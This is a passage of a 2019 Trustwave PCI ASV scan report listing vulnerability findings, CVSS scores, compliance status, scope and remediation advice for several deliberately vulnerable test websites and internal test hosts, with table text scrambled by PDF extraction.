ntest.com present
Database.
(MV PCI7)

Note to scan customer:


96 hackazon.websca Auto-Completion Enabled for Low 1.2 Out of Scope
This vulnerability is not recognized in the National Vulnerability
ntest.com Password Fields
Database.
(MV PCI7)

Note to scan customer:


97 hackazon.websca System Responds to SYN+FIN Low 0.0 Out of Scope
This vulnerability is not recognized in the National Vulnerability
ntest.com TCP Packets
Database.
(MV PCI7)

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 18 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Summary

Vulnerabilities Noted per Severity CVSS Compliance Exceptions, False Positives, or Compensating Controls (Noted by
# Component
Component Level Score Status the ASV for this vulnerability)

98 hackazon.websca Web Application Potentially Info 0.0 Out of Scope


ntest.com Sensitive CGI Parameter
(MV PCI7) Detection

99 hackazon.websca Discovered Web Applications Info 0.0 Out of Scope


ntest.com
(MV PCI7)

100 hackazon.websca Operating System Potentially Info 0.0 Out of Scope


ntest.com Determined via Apache
(MV PCI7) Requests

101 hackazon.websca Discovered Web Directories Info 0.0 Out of Scope


ntest.com
(MV PCI7)

102 hackazon.websca SSL Perfect Forward Secrecy Info 0.0 Out of Scope
ntest.com Supported
(MV PCI7)
Note to scan customer:
103 hackazon.websca Enumerated Applications Info 0.0 Out of Scope
This vulnerability is not recognized in the National Vulnerability
ntest.com
Database.
(MV PCI7)

Note to scan customer:


104 hackazon.websca SSL-TLS Certificate Information Info 0.0 Out of Scope
This vulnerability is not recognized in the National Vulnerability
ntest.com
Database.
(MV PCI7)

Note to scan customer:


105 hackazon.websca jQuery Script Detection Info 0.0 Out of Scope
This vulnerability is not recognized in the National Vulnerability
ntest.com
Database.
(MV PCI7)

Note to scan customer:


106 hackazon. Website Location Detected Info 0.0 Out of Scope
This vulnerability is not recognized in the National Vulnerability

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 19 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Summary

Vulnerabilities Noted per Severity CVSS Compliance Exceptions, False Positives, or Compensating Controls (Noted by
# Component
Component Level Score Status the ASV for this vulnerability)
Database.
webscantest.com
(MV PCI7)

107 hackazon.websca Discovered HTTP Methods Info 0.0 Out of Scope


ntest.com
(MV PCI7)
Note to scan customer:
108 hackazon.websca Host Detected Info 0.0 Out of Scope
This vulnerability is not recognized in the National Vulnerability
ntest.com
Database.
(MV PCI7)

109 hackazon.websca HTTP Responses Missing Info 0.0 Out of Scope


ntest.com Character Encoding
(MV PCI7)

110 hackazon.websca Enumerated SSL/TLS Cipher Info 0.0 Out of Scope


ntest.com Suites
(MV PCI7)
Note to scan customer:
111 hackazon.websca Adobe Flash crossdomain.xml Info 0.0 Out of Scope
This vulnerability is not recognized in the National Vulnerability
ntest.com Found
Database.
(MV PCI7)

Note to scan customer:


112 hackazon.websca Service Detected Info 0.0 Out of Scope
This vulnerability is not recognized in the National Vulnerability
ntest.com
Database.
(MV PCI7)

Note to scan customer:


113 hackazon.websca Insecure or no Content-Security- Info 0.0 Out of Scope
This vulnerability is not recognized in the National Vulnerability
ntest.com Policy header
Database.
(MV PCI7)

Note to scan customer:


114 hackazon. Hostname Resolved Info 0.0 Out of Scope
This vulnerability is not recognized in the National Vulnerability

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 20 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Summary

Vulnerabilities Noted per Severity CVSS Compliance Exceptions, False Positives, or Compensating Controls (Noted by
# Component
Component Level Score Status the ASV for this vulnerability)
Database.
webscantest.com
(MV PCI7)
Note to scan customer:
115 hackazon.websca Insufficient or No use of Strict Info 0.0 Out of Scope
This vulnerability is not recognized in the National Vulnerability
ntest.com Transport Security header
Database.
(MV PCI7)

Note to scan customer:


116 hackazon.websca Website Detected Info 0.0 Out of Scope
This vulnerability is not recognized in the National Vulnerability
ntest.com
Database.
(MV PCI7)

117 hackazon.websca Enumerated Hostnames Info 0.0 Out of Scope


ntest.com
(MV PCI7)
Consolidated Solution/Correction Plan for the above Component:

• Ensure that any web applications running on this host is configured following industry security best practices.
• Upgrade and/or install security updates for Apache HTTP Server.
• Restrict access to any files, applications, and/or network services for which there is no business requirement to be publicly accessible.
• Ensure that any web applications running on this host properly validate and transmit user input in a secure manner.
• Ensure that all applications and services running on this host are configured to appropriately restrict access to sensitive information. This includes account
information and configuration settings.
• Configure the HTTP service(s) running on this host to adhere to information security best practices.
• Upgrade and/or install security updates for jQuery.

Note to scan customer:


118 hackxor.sourcefor Unsupported version of Nginx High 10.0 Out of Scope
This vulnerability is not recognized in the National Vulnerability
ge.net Detected
Database. An unsupported version of software will no longer receive
(MV PCI7)
patches/updates, and for this reason, Trustwave has set the CVSSv2
base score to 10 and the CVSSv2 vector to
AV:N/AC:L/Au:N/C:C/I:C/A:C.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 21 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Summary

Vulnerabilities Noted per Severity CVSS Compliance Exceptions, False Positives, or Compensating Controls (Noted by
# Component
Component Level Score Status the ASV for this vulnerability)

Note to scan customer:


119 hackxor.sourcefor Insecure HTTP Methods Enabled Medium 5.8 Out of Scope
This vulnerability is not recognized in the National Vulnerability
ge.net
Database. Information leakage through enabled insecure HTTP
(MV PCI7)
methods violates PCI DSS and is considered an automatic failing
condition.

120 hackxor.sourcefor Nginx ngx_http_mp4_module Medium 5.8 Out of Scope


ge.net Information Disclosure
(MV PCI7) Vulnerability, CVE-2018-16845
Note to scan customer:
121 hackxor.sourcefor No Clickjacking Protection Low 2.6 Out of Scope
This vulnerability is not recognized in the National Vulnerability
ge.net present
Database.
(MV PCI7)

Note to scan customer:


122 hackxor.sourcefor Indexable Web Directories Low 2.6 Out of Scope
This vulnerability is not recognized in the National Vulnerability
ge.net
Database.
(MV PCI7)

Note to scan customer:


123 hackxor.sourcefor System Responds to SYN+FIN Low 0.0 Out of Scope
This vulnerability is not recognized in the National Vulnerability
ge.net TCP Packets
Database.
(MV PCI7)

124 hackxor.sourcefor HTTP Responses Missing Info 0.0 Out of Scope


ge.net Character Encoding
(MV PCI7)
Note to scan customer:
125 hackxor.sourcefor Hostname Resolved Info 0.0 Out of Scope
This vulnerability is not recognized in the National Vulnerability
ge.net
Database.
(MV PCI7)

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 22 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Summary

Vulnerabilities Noted per Severity CVSS Compliance Exceptions, False Positives, or Compensating Controls (Noted by
# Component
Component Level Score Status the ASV for this vulnerability)
Note to scan customer:
126 hackxor.sourcefor Service Detected Info 0.0 Out of Scope
This vulnerability is not recognized in the National Vulnerability
ge.net
Database.
(MV PCI7)

Note to scan customer:


127 hackxor.sourcefor Website Location Detected Info 0.0 Out of Scope
This vulnerability is not recognized in the National Vulnerability
ge.net
Database.
(MV PCI7)

Note to scan customer:


128 hackxor.sourcefor Enumerated Applications Info 0.0 Out of Scope
This vulnerability is not recognized in the National Vulnerability
ge.net
Database.
(MV PCI7)

Note to scan customer:


129 hackxor.sourcefor Website Detected Info 0.0 Out of Scope
This vulnerability is not recognized in the National Vulnerability
ge.net
Database.
(MV PCI7)

130 hackxor.sourcefor Discovered HTTP Methods Info 0.0 Out of Scope


ge.net
(MV PCI7)
Note to scan customer:
131 hackxor.sourcefor Website Not Detected Info 0.0 Out of Scope
This vulnerability is not recognized in the National Vulnerability
ge.net
Database. Host not responsive.
(MV PCI7)

132 hackxor.sourcefor Discovered Web Directories Info 0.0 Out of Scope


ge.net
(MV PCI7)
Note to scan customer:
133 hackxor.sourcefor Insecure or no Content-Security- Info 0.0 Out of Scope
This vulnerability is not recognized in the National Vulnerability
ge.net Policy header
Database.
(MV PCI7)

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 23 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Summary

Vulnerabilities Noted per Severity CVSS Compliance Exceptions, False Positives, or Compensating Controls (Noted by
# Component
Component Level Score Status the ASV for this vulnerability)
Note to scan customer:
134 hackxor.sourcefor Host Detected Info 0.0 Out of Scope
This vulnerability is not recognized in the National Vulnerability
ge.net
Database.
(MV PCI7)

Consolidated Solution/Correction Plan for the above Component:

• Ensure that any web applications running on this host is configured following industry security best practices.
• Configure the HTTP service(s) running on this host to adhere to information security best practices.
• The version of Nginx is out of support by the vendor. Update to a supported version.
• Upgrade and/or install security updates for Nginx.
• Restrict access to any files, applications, and/or network services for which there is no business requirement to be publicly accessible.
• Verify your Scan Setup for correct IP Address and Domain Name information. Configure your network to allow access from Trustwave scanners.

Note to scan customer:


135 ioc-signatures- Host Detected Info 0.0 Pass
This vulnerability is not recognized in the National Vulnerability
inc.tw-test.net
Database.
(MV PCI8)

Note to scan customer:


136 ioc-signatures- Hostname Resolved Info 0.0 Pass
This vulnerability is not recognized in the National Vulnerability
inc.tw-test.net
Database.
(MV PCI8)

Consolidated Solution/Correction Plan for the above Component:

Note to scan customer:


137 jarlsberg.appspot. TLSv1.0 Supported High 10.0 Out of Scope
This vulnerability is not recognized in the National Vulnerability
com
Database. TLS v1.0 violates PCI DSS and is considered an automatic
(MV PCI9)
failing condition.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 24 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Summary

Vulnerabilities Noted per Severity CVSS Compliance Exceptions, False Positives, or Compensating Controls (Noted by
# Component
Component Level Score Status the ASV for this vulnerability)

138 jarlsberg.appspot. Block cipher algorithms with Medium 5.0 Out of Scope
com block size of 64 bits (like DES
(MV PCI9) and 3DES) birthday attack
known as Sweet32, CVE-2016-
2183

139 jarlsberg.appspot. SSLv2, SSLv3 and TLS v1.0 Medium 4.3 Out of Scope
com Vulnerable to CBC Attacks via
(MV PCI9) chosen-plaintext (BEAST), CVE-
2011-3389
Note to scan customer:
140 jarlsberg.appspot. System Responds to SYN+FIN Low 0.0 Out of Scope
This vulnerability is not recognized in the National Vulnerability
com TCP Packets
Database.
(MV PCI9)

Note to scan customer:


141 jarlsberg.appspot. Host Detected Info 0.0 Out of Scope
This vulnerability is not recognized in the National Vulnerability
com
Database.
(MV PCI9)

142 jarlsberg.appspot. Enumerated SSL/TLS Cipher Info 0.0 Out of Scope


com Suites
(MV PCI9)

143 jarlsberg.appspot. Enumerated Hostnames Info 0.0 Out of Scope


com
(MV PCI9)
Note to scan customer:
144 jarlsberg.appspot. Hostname Resolved Info 0.0 Out of Scope
This vulnerability is not recognized in the National Vulnerability
com
Database.
(MV PCI9)

Note to scan customer:


145 jarlsberg.appspot. Service Detected Info 0.0 Out of Scope
This vulnerability is not recognized in the National Vulnerability
com
Database.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 25 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Summary

Vulnerabilities Noted per Severity CVSS Compliance Exceptions, False Positives, or Compensating Controls (Noted by
# Component
Component Level Score Status the ASV for this vulnerability)

(MV PCI9)

146 jarlsberg.appspot. Wildcard SSL Certificate Info 0.0 Out of Scope


com Detected
(MV PCI9)
Note to scan customer:
147 jarlsberg.appspot. SSL-TLS Certificate Information Info 0.0 Out of Scope
This vulnerability is not recognized in the National Vulnerability
com
Database.
(MV PCI9)

148 jarlsberg.appspot. SSL Certificate Expiring Soon Info 0.0 Out of Scope
com
(MV PCI9)
Consolidated Solution/Correction Plan for the above Component:

• Restrict access to any files, applications, and/or network services for which there is no business requirement to be publicly accessible.
• Configure the SSL service(s) running on this host to adhere to information security best practices.

Note to scan customer:


149 pentesteracadem TLSv1.0 Supported High 10.0 Out of Scope
This vulnerability is not recognized in the National Vulnerability
ylab.appspot.com
Database. TLS v1.0 violates PCI DSS and is considered an automatic
(MV PCI10)
failing condition.

150 pentesteracadem Block cipher algorithms with Medium 5.0 Out of Scope
ylab.appspot.com block size of 64 bits (like DES
(MV PCI10) and 3DES) birthday attack
known as Sweet32, CVE-2016-
2183

151 pentesteracadem SSLv2, SSLv3 and TLS v1.0 Medium 4.3 Out of Scope
ylab.appspot.com Vulnerable to CBC Attacks via
(MV PCI10) chosen-plaintext (BEAST), CVE-
2011-3389

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 26 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Summary

Vulnerabilities Noted per Severity CVSS Compliance Exceptions, False Positives, or Compensating Controls (Noted by
# Component
Component Level Score Status the ASV for this vulnerability)

152 pentesteracadem Enumerated Hostnames Info 0.0 Out of Scope


ylab.appspot.com
(MV PCI10)

153 pentesteracadem Enumerated SSL/TLS Cipher Info 0.0 Out of Scope


ylab.appspot.com Suites
(MV PCI10)

154 pentesteracadem Wildcard SSL Certificate Info 0.0 Out of Scope


ylab.appspot.com Detected
(MV PCI10)
Note to scan customer:
155 pentesteracadem Service Detected Info 0.0 Out of Scope
This vulnerability is not recognized in the National Vulnerability
ylab.appspot.com
Database.
(MV PCI10)

Note to scan customer:


156 pentesteracadem Hostname Resolved Info 0.0 Out of Scope
This vulnerability is not recognized in the National Vulnerability
ylab.appspot.com
Database.
(MV PCI10)

Note to scan customer:


157 pentesteracadem Host Detected Info 0.0 Out of Scope
This vulnerability is not recognized in the National Vulnerability
ylab.appspot.com
Database.
(MV PCI10)

158 pentesteracadem SSL Certificate Expiring Soon Info 0.0 Out of Scope
ylab.appspot.com
(MV PCI10)
Note to scan customer:
159 pentesteracadem SSL-TLS Certificate Information Info 0.0 Out of Scope
This vulnerability is not recognized in the National Vulnerability
ylab.appspot.com
Database.
(MV PCI10)

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 27 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Summary

Vulnerabilities Noted per Severity CVSS Compliance Exceptions, False Positives, or Compensating Controls (Noted by
# Component
Component Level Score Status the ASV for this vulnerability)
Consolidated Solution/Correction Plan for the above Component:

• Configure the SSL service(s) running on this host to adhere to information security best practices.

Note to scan customer:


160 port-app-dv1- Hostname Resolved Info 0.0 Pass
This vulnerability is not recognized in the National Vulnerability
01.tw-test.net
Database.
(MV PCI11)

Note to scan customer:


161 port-app-dv1- Host Detected Info 0.0 Pass
This vulnerability is not recognized in the National Vulnerability
01.tw-test.net
Database.
(MV PCI11)

Consolidated Solution/Correction Plan for the above Component:

Note to scan customer:


162 port-app-dv1- Hostname Resolved Info 0.0 Out of Scope
This vulnerability is not recognized in the National Vulnerability
02.tw-test.net
Database.
(MV PCI12)

Note to scan customer:


163 port-app-dv1- Host Detected Info 0.0 Out of Scope
This vulnerability is not recognized in the National Vulnerability
02.tw-test.net
Database.
(MV PCI12)

Consolidated Solution/Correction Plan for the above Component:

Note to scan customer:


164 port-app-dv2- Hostname could not be Low 0.0 Out of Scope
This vulnerability is not recognized in the National Vulnerability
02.tw-test.net Resolved
Database. Host not responsive.
(MV PCI13)

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 28 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Summary

Vulnerabilities Noted per Severity CVSS Compliance Exceptions, False Positives, or Compensating Controls (Noted by
# Component
Component Level Score Status the ASV for this vulnerability)
Consolidated Solution/Correction Plan for the above Component:

• Verify your Scan Setup for correct IP Address and Domain Name information. Configure your network to allow access from Trustwave scanners.

Note to scan customer:


165 port-evm-dv1- Hostname could not be Low 0.0 Fail
This vulnerability is not recognized in the National Vulnerability
03.tw-test.net Resolved
Database. Host not responsive.

Consolidated Solution/Correction Plan for the above Component:

• Verify your Scan Setup for correct IP Address and Domain Name information. Configure your network to allow access from Trustwave scanners.

Part 3b. Special Notes by Component

Scan customer's description of action taken and declaration that


# Component Special Note Item Noted
software is either implemented securely or removed

1 crackme.cenzic.c Unknown services


om
(MV PCI2)

2 crackme.trustwa Unknown services


ve.com
(MV PCI3)

3 demo.testfire.net Embedded links or code from out-of-scope tcp/443 https


(Jen's PCI Test) domains

4 demo.testfire.net Embedded links or code from out-of-scope tcp/443 https


(Jen's PCI Test) domains

5 demo.testfire.net Embedded links or code from out-of-scope tcp/80 http


(Jen's PCI Test) domains

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 29 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Summary

Scan customer's description of action taken and declaration that


# Component Special Note Item Noted
software is either implemented securely or removed

6 demo.testfire.net Embedded links or code from out-of-scope tcp/80 http


(Jen's PCI Test) domains

7 demo.testfire.net Embedded links or code from out-of-scope tcp/8080 http


(Jen's PCI Test) domains

8 demo.testfire.net Embedded links or code from out-of-scope tcp/8080 http


(Jen's PCI Test) domains

9 demo.testfire.net Embedded links or code from out-of-scope tcp/8443 https


(Jen's PCI Test) domains

10 demo.testfire.net Embedded links or code from out-of-scope tcp/8443 https


(Jen's PCI Test) domains

11 hackxor.sourcefo Directory Browsing Enabled tcp/80 http


rge.net (nginx:nginx)
(MV PCI7)

12 hackxor.sourcefo Directory Browsing Enabled tcp/80 http


rge.net (nginx:nginx)
(MV PCI7)

Part 3c. Special Notes - Full Text

Note

Directory Browsing Enabled


Note to scan customer: Browsing of directories on web servers can lead to information disclosure or potential exploit. Due to increased risk to the cardholder data
environment, please 1) justify the business need for this configuration to the ASV, or 2) confirm that it is disabled. Please consult your ASV if you have questions about this
Special Note.
Embedded links or code from out-of-scope domains
Note to scan customer: Due to increased risk to the cardholder data environment when embedded links redirect traffic to domains outside the merchant’s CDE scope, 1)

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 30 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Summary

Note

confirm that this code is obtained from a trusted source, that the embedded links redirect to a trusted source, and that the code is implemented securely, or 2) confirm that
the code has been removed. Consult your ASV if you have questions about this Special Note.
Unknown services
Note to scan customer: Unidentified services have been detected. Due to increased risk to the cardholder data environment, identify the service, then either 1) justify the
business need for this service and confirm it is securely implemented, or 2) identify the service and confirm that it is disabled. Consult your ASV if you have questions about
this Special Note.

Part 4a. Scope Submitted by Scan Customer for Discovery

IP Address/ranges/subnets, domains, URLs, etc.

IP Address: 10.70.244.2 (port-app-dv1-01.tw-test.net)

IP Address: 10.70.244.28 (agent-av-mirror-inc.tw-test.net)

IP Address: 10.70.244.29 (ioc-signatures-inc.tw-test.net)

IP Address: 10.70.244.3 (port-app-dv1-02.tw-test.net)

IP Address: 10.76.128.61 (crackmebank.campbell.devlab)

IP Address: 172.217.0.20 (google-gruyere.appspot.com)

IP Address: 172.217.4.52 (pentesteracademylab.appspot.com)

IP Address: 204.13.201.47 (crackme.trustwave.com)

IP Address: 204.13.201.47 (crackme.cenzic.com)

IP Address: 216.105.38.10 (hackxor.sourceforge.net)

IP Address: 216.58.192.244 (jarlsberg.appspot.com)

IP Address: 2607:f8b0:4009:804:0:0:0:2014 (pentesteracademylab.appspot.com)

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 31 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Summary

IP Address/ranges/subnets, domains, URLs, etc.

IP Address: 2607:f8b0:4009:80f:0:0:0:2014 (jarlsberg.appspot.com)

IP Address: 2607:f8b0:4009:813:0:0:0:2014 (google-gruyere.appspot.com)

IP Address: 65.61.137.117 (demo.testfire.net)

IP Address: 69.164.223.171 (hackazon.webscantest.com)

Part 4b. Scan Customer Designated "In-Scope" Components (Scanned)

IP Address/ranges/subnets, domains, URLs, etc.

crackme.cenzic.com / MV PCI2

demo.testfire.net / Jen's PCI Test

ioc-signatures-inc.tw-test.net / MV PCI8

port-app-dv1-01.tw-test.net / MV PCI11

Part 4c. Scan Customer Designated "Out-of-Scope" Components (Not Scanned)

IP Address/ranges/subnets, domains, URLs, etc.

agent-av-mirror-inc.tw-test.net (MV PCI1) -- Scan customer attests that target or targets are out-of-scope and do not need to be scanned for PCI.

crackme.trustwave.com (MV PCI3) -- Scan customer attests that target or targets are out-of-scope and do not need to be scanned for PCI.

crackmebank.campbell.devlab (MV PCI4) -- Scan customer attests that target or targets are out-of-scope and do not need to be scanned for PCI.

cyclone.ciphertechs.com -- These hosts were not visible and the scanner was unable to decide on the overall security of the environment per PCI ASV requirements.

google-gruyere.appspot.com (MV PCI6) -- Scan customer attests that target or targets are out-of-scope and do not need to be scanned for PCI.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 32 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Summary

IP Address/ranges/subnets, domains, URLs, etc.

hackazon.webscantest.com (MV PCI7) -- Scan customer attests that target or targets are out-of-scope and do not need to be scanned for PCI.

hackxor.sourceforge.net (MV PCI7) -- Scan customer attests that target or targets are out-of-scope and do not need to be scanned for PCI.

jarlsberg.appspot.com (MV PCI9) -- Scan customer attests that target or targets are out-of-scope and do not need to be scanned for PCI.

pentesteracademylab.appspot.com (MV PCI10) -- Scan customer attests that target or targets are out-of-scope and do not need to be scanned for PCI.

port-app-dv1-02.tw-test.net (MV PCI12) -- Scan customer attests that target or targets are out-of-scope and do not need to be scanned for PCI.

port-app-dv2-02.tw-test.net (MV PCI13) -- Scan customer attests that target or targets are out-of-scope and do not need to be scanned for PCI.

port-evm-dv1-03.tw-test.net -- These hosts were not visible and the scanner was unable to decide on the overall security of the environment per PCI ASV requirements.

port-rly-dv3-01.tw-test.net (MV PCI15) -- Scan customer attests that target or targets are out-of-scope and do not need to be scanned for PCI.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 33 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

Part 1. Scan Information

Scan Customer Company JS Int-B Roles 08052019 ASV Company Trustwave Holdings, Inc.
Date Scan Completed 2019-08-05 Scan Expiration Date N/A

Part 2. Vulnerability Details

The following issues were identified during this scan. Please review all items and address all that items that affect compliance or the security of your system.

In the tables below you can find the following information about each TrustKeeper finding.

• CVE Number - The Common Vulnerabilities and Exposure number(s) for the detected vulnerability - an industry standard for cataloging vulnerabilities. A comprehensive
list of CVEs can be found at nvd.nist.gov or cve.mitre.org.
• Vulnerability - This describes the name of the finding, which usually includes the name of the application or operating system that is vulnerable.

• CVSS Score - The Common Vulnerability Scoring System is an open framework for communicating the characteristics and impacts of IT vulnerabilities. Further
information can be found at www.first.org/cvss or nvd.nist.gov/cvss.cfm.
• Severity - This identifies the risk of the vulnerability. It is closely associated with the CVSS score.

• Compliance Status - Findings that are PCI compliance violations are indicated with a Fail status. In order to pass a vulnerability scan, these findings must be addressed.
Most findings with a CVSS score of 4 or more, or a Severity of Medium or higher, will have a Fail status. Some exceptions exist, such as DoS vulnerabilities, which are
not included in PCI compliance.
• Details - TrustKeeper provides the port on which the vulnerability is detected, details about the vulnerability, links to available patches and other specific guidance on
actions you can take to address each vulnerability.

For more information on how to read this section and the scoring methodology used, please refer to the appendix.

agent-av-mirror-inc.tw-test.net (MV PCI1)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

1 Host Detected 0.0 Info Pass This host responded to network probes.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 34 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

agent-av-mirror-inc.tw-test.net (MV PCI1)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Evidence:
hostname: agent-av-mirror-inc.tw-test.net
ip_address: 10.70.244.28

2 Hostname Resolved 0.0 Info Pass This hostname was resolved to one or more IP addresses using DNS
resolution.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N

Evidence:
hostname: agent-av-mirror-inc.tw-test.net
ip_address: 10.70.244.28

crackme.cenzic.com (MV PCI2)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

1 System Responds to 0.0 Low Pass Port: tcp/443


SYN+FIN TCP Packets
This device responded to a TCP packet with both the SYN and FIN bits
set. Such packets do not occur in typical network traffic, but can be
used by attackers to bypass the security rules configured in non-
stateful firewalls and establish connections with protected hosts.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N

Reference:
http://www.kb.cert.org/vuls/id/464113

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 35 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

crackme.cenzic.com (MV PCI2)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Remediation:
Verify that stateful inspection has been implemented on the network to
protect this host from out-of-state attacks. Confirm with your vendor
that there are no known rule-bypass concerns with this device, and
that the software revision is current. You may additionally wish to
create specific filtering rules designed to drop or reject packets with
certain combinations of bits set in initial synchronization packets such
as SYN/FIN, and SYN/RST. Do not use routable IP space internally,
except within your DMZ.

2 System Responds to 0.0 Low Pass Port: tcp/80


SYN+FIN TCP Packets
This device responded to a TCP packet with both the SYN and FIN bits
set. Such packets do not occur in typical network traffic, but can be
used by attackers to bypass the security rules configured in non-
stateful firewalls and establish connections with protected hosts.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N

Reference:
http://www.kb.cert.org/vuls/id/464113

Remediation:
Verify that stateful inspection has been implemented on the network to
protect this host from out-of-state attacks. Confirm with your vendor
that there are no known rule-bypass concerns with this device, and
that the software revision is current. You may additionally wish to
create specific filtering rules designed to drop or reject packets with
certain combinations of bits set in initial synchronization packets such
as SYN/FIN, and SYN/RST. Do not use routable IP space internally,
except within your DMZ.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 36 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

crackme.cenzic.com (MV PCI2)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

3 Service Detected 0.0 Info Pass Port: udp/123

This service responded to network probes.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: ntp

Evidence:
application_protocol: ntp
ip_address: 204.13.201.47
port_number: 123
transport_protocol: udp

4 Hostname Resolved 0.0 Info Pass This hostname was resolved to one or more IP addresses using DNS
resolution.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N

Evidence:
hostname: crackme.cenzic.com
ip_address: 204.13.201.47

5 Host Detected 0.0 Info Pass This host responded to network probes.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N

Evidence:
hostname: crackme.cenzic.com
ip_address: 204.13.201.47

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 37 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

crackme.cenzic.com (MV PCI2)


